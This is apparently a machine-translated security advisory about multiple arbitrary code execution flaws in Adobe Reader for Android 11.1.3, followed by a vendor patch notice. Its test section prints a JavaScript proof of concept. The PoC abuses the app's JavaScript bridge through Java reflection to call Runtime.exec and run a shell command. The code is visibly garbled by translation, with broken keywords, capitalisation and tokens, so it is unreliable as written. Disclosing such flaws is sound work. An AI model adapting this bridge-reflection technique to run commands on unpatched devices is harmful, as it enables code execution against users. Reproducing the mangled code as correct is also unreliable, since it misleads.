Multiple Arbitrary Code Execution Vulnerabilities in Adobe Reader for Android

Release date:
Updated on:

Affected Systems:
Adobe Reader for Android
Description:
--------------------------------------------------------------------------------
Bugtraq id: 66798
 
Adobe Reader for Android is a free Adobe Reader mobile app for Android and iOS devices (including iPad and iPhone.
 
Adobe Reader for Android 11.1.3 has multiple arbitrary code execution vulnerabilities. Attackers can exploit these vulnerabilities to execute arbitrary code in the context of the affected application.
 
<* Source: Yorick Koster
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Function execute (bridge, cmd ){
Return bridge. getClass (). forName ('java. lang. runtime ')
.Getmethod('getruntime', null0000.invoke(null,null0000.exe c (cmd );
}
 
If (window. _ app ){
Try {
Var path = '/data/com. adobe. reader/erereader.poc.txt ';
Execute (window. _ app, ['/system/bin/Sh','-C', 'echo \ "Lorem ipsum \"> '+ path]);
Window. _ app. alert (path + 'created ', 3 );
} Catch (e ){
Window. _ app. alert (e, 0 );
}
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Adobe
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://www.adobe.com/support/security/